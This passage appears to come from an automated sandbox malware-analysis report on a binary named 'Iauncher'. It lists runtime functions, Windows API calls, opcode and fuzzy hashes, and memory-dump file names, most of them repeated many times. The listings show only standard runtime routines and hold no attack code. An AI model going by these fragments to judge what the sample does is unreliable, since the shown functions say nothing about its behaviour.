                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: b2f0ca69c0b7168ba6ae898efcf41b292320620bb61181eeddfd5a7818b29ae1
                                                                                                                                                                              • Instruction ID: e2a1d6657e5597a7310d1a2c1d015557a8f160c1c2b9e1e3f5b411250858860f
                                                                                                                                                                              • Opcode Fuzzy Hash: b2f0ca69c0b7168ba6ae898efcf41b292320620bb61181eeddfd5a7818b29ae1
                                                                                                                                                                              • Instruction Fuzzy Hash: 0A016772A48629EFDB159F54DD05BAEB7B9FB04735F010525F811E22D0DB74E900DE90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00F14635
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F14640
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00F146AE
                                                                                                                                                                                • Part of subcall function 00F14791: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F147A9
                                                                                                                                                                              • std::locale::_Setgloballocale.LIBCPMT ref: 00F1465B
                                                                                                                                                                              • _Yarn.LIBCPMT ref: 00F14671
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1088826258-0
                                                                                                                                                                              • Opcode ID: 97e475a25d4044939de52abf8ad37f0d5fe4e18c877cdf4de7580c04fe06c525
                                                                                                                                                                              • Instruction ID: 936f2762fdeb493d7a82a23cba5f4f39238051f79e25ca0b33ad60c09265527d
                                                                                                                                                                              • Opcode Fuzzy Hash: 97e475a25d4044939de52abf8ad37f0d5fe4e18c877cdf4de7580c04fe06c525
                                                                                                                                                                              • Instruction Fuzzy Hash: 64017C75A009159BCB0AEB20DD955BC7BA2EFC5760B244018E80197382DF78BA86FB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00F1A773,00000000,?,?,?,?,?,00F1A89D,00000002,FlsGetValue,00F35D40,FlsGetValue), ref: 00F1A7CF
                                                                                                                                                                              • GetLastError.KERNEL32(?,00F1A773,00000000,?,?,?,?,?,00F1A89D,00000002,FlsGetValue,00F35D40,FlsGetValue,00000000,?,00F1972D), ref: 00F1A7D9
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00F1972D,?,?,?,?,?,?), ref: 00F1A801
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              • Opcode ID: 3ea9f31e0fd8a258e250443c0bdc5198085aea805a8a45d155ebf989580a84cd
                                                                                                                                                                              • Instruction ID: 22ab64b101595aa1a215a8a5e058c13a00e0b2786ac79fb5408b73238b1d4978
                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea9f31e0fd8a258e250443c0bdc5198085aea805a8a45d155ebf989580a84cd
                                                                                                                                                                              • Instruction Fuzzy Hash: 14E01271780208B6DB111B60ED46B593F559B00B70F114020FA0DE40E1E762B8A5B585
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(A03C9F43,00000000,00000000,00000000), ref: 00F278D3
                                                                                                                                                                                • Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F27B2E
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F27B76
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F27C19
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                              • Opcode ID: 21555b61e934ab404de7388ec5d0fe9b1784c71a3643753fd9430e16659bb924
                                                                                                                                                                              • Instruction ID: 6f3e99353359696b63fb9c2ae9c00c01eb3f0a1f14dd3090da38e73f9ea78968
                                                                                                                                                                              • Opcode Fuzzy Hash: 21555b61e934ab404de7388ec5d0fe9b1784c71a3643753fd9430e16659bb924
                                                                                                                                                                              • Instruction Fuzzy Hash: 7CD178B5E042699FCF05DFE8E880AADBBB5FF48310F18452AE855EB351D730A941DB50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                              • Opcode ID: 70f99301476cb9cb24e25b7ae0cd6018a13a1eea419b74afc10a78108920d5ba
                                                                                                                                                                              • Instruction ID: b508922d6c25c52514402a15660780667ba7135c44c0b7fd46e90ed260a2a691
                                                                                                                                                                              • Opcode Fuzzy Hash: 70f99301476cb9cb24e25b7ae0cd6018a13a1eea419b74afc10a78108920d5ba
                                                                                                                                                                              • Instruction Fuzzy Hash: 1451DF72A092069FEB299F54D861BFA73A4EF41730F54402DE81286291E7B6ECC1E7D1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F2942F
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F29436
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00F29470
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00F29477
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                              • Opcode ID: d3142c91c9324273ce203ceb4133b97c57d4290ff64dbc71860a654829f2784f
                                                                                                                                                                              • Instruction ID: b9fefaa447735a86b522048a440af6e765e0c7888594c21b3b3d70a529ead52e
                                                                                                                                                                              • Opcode Fuzzy Hash: d3142c91c9324273ce203ceb4133b97c57d4290ff64dbc71860a654829f2784f
                                                                                                                                                                              • Instruction Fuzzy Hash: 5F21D332A08225AF9B20EF66AC8096BB7ADFF40374B00C519F92597240D774EC41A790
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 7ba75f333217c2b45ead4eb6da17610e7e096b7a3b838c7da42f586d0fb09f16
                                                                                                                                                                              • Instruction ID: 6c913291c4c3ee1353e5dfe7debe40a84d796068f3e0e2905ed39f05358f4902
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ba75f333217c2b45ead4eb6da17610e7e096b7a3b838c7da42f586d0fb09f16
                                                                                                                                                                              • Instruction Fuzzy Hash: 0E219D33A00225EF9B20AFA1EC49D6A77ADAF00374710462AF9559B592DF34EC40E7A0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00F2A369
                                                                                                                                                                                • Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2A3A1
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2A3C1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                              • Opcode ID: 0dbef6afd9b8c37ac6b3aa1b63557cdb0d85c49e8405f7415c99156d890c227f
                                                                                                                                                                              • Instruction ID: 5d965dafc62356c99d00457e20d15e99f0a667d5d7595f334ee576c1e4a1068f
                                                                                                                                                                              • Opcode Fuzzy Hash: 0dbef6afd9b8c37ac6b3aa1b63557cdb0d85c49e8405f7415c99156d890c227f
                                                                                                                                                                              • Instruction Fuzzy Hash: F61104F29026397F6611B7B1BC8ACAF3A9DDF443B43110024F401D5101FE69ED4075B2
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F11E82
                                                                                                                                                                              • int.LIBCPMT ref: 00F11E95
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
                                                                                                                                                                                • Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2
                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 00F11EC8
                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00F11EDE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 459529453-0
                                                                                                                                                                              • Opcode ID: dbffce7667b0a7fb610953c4cda4c2c378846442d63189dcff00b90898c25313
                                                                                                                                                                              • Instruction ID: cee57ff8562a457f425101e1cd6db8fe11dc920dac9ead7e1bd066b00997d65f
                                                                                                                                                                              • Opcode Fuzzy Hash: dbffce7667b0a7fb610953c4cda4c2c378846442d63189dcff00b90898c25313
                                                                                                                                                                              • Instruction Fuzzy Hash: 3501A732900518ABCB15ABE5DC058EE7769AF84770B200159F90197291EB74EE81F790
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000), ref: 00F30A76
                                                                                                                                                                              • GetLastError.KERNEL32(?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000,00000000,?,00F281F4,00000000), ref: 00F30A82
                                                                                                                                                                                • Part of subcall function 00F30A48: CloseHandle.KERNEL32(FFFFFFFE,00F30A92,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000,00000000), ref: 00F30A58
                                                                                                                                                                              • ___initconout.LIBCMT ref: 00F30A92
                                                                                                                                                                                • Part of subcall function 00F30A0A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F30A39,00F2F918,00000000,?,00F27C6D,00000000,00000000,00000000,00000000), ref: 00F30A1D
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000), ref: 00F30AA7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                              • Opcode ID: e42cb861f0849a7fd9f63754c571374269f5308f6309a392aae841c31440a70b
                                                                                                                                                                              • Instruction ID: 78df07c4c595bc30dcf1421e94f8449ccf87c32a864a00a24eb739230919bdd4
                                                                                                                                                                              • Opcode Fuzzy Hash: e42cb861f0849a7fd9f63754c571374269f5308f6309a392aae841c31440a70b
                                                                                                                                                                              • Instruction Fuzzy Hash: B9F01536500258BBCF622FD5FC08A8A3F67FF183B1F044021FA5985160CA36A820BB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 00F19DB2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                              • Opcode ID: badf9446feb659dbc4616fe04210cc141a0e1d3aeb7b83b27f1d3370fd771fbe
                                                                                                                                                                              • Instruction ID: ebef460b67cbbb61f5e40bed6c4db2ba20bd359af1f1a43520bbe1f051d35206
                                                                                                                                                                              • Opcode Fuzzy Hash: badf9446feb659dbc4616fe04210cc141a0e1d3aeb7b83b27f1d3370fd771fbe
                                                                                                                                                                              • Instruction Fuzzy Hash: 53419A72D04209AFCF15CF94CD81AEEBBB5FF48310F194099FA05A7221D3B59991EBA1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00F12000
                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F12038
                                                                                                                                                                                • Part of subcall function 00F1472C: _Yarn.LIBCPMT ref: 00F1474B
                                                                                                                                                                                • Part of subcall function 00F1472C: _Yarn.LIBCPMT ref: 00F1476F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                              • API String ID: 1908188788-1405518554
                                                                                                                                                                              • Opcode ID: 0f9ff2a017ecaae271a82eb0cbf569e123d5f82c5587aeb62229c8f52101d401
                                                                                                                                                                              • Instruction ID: cbd659f437363cf8cb9dbde800fb343ef10205373d3611122d8e145883fe8d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: 0f9ff2a017ecaae271a82eb0cbf569e123d5f82c5587aeb62229c8f52101d401
                                                                                                                                                                              • Instruction Fuzzy Hash: D1F01771505B809E83319FBA8881487FBE4BE293603908A2EE0DEC3A11D734F444DB6A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:9.2%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
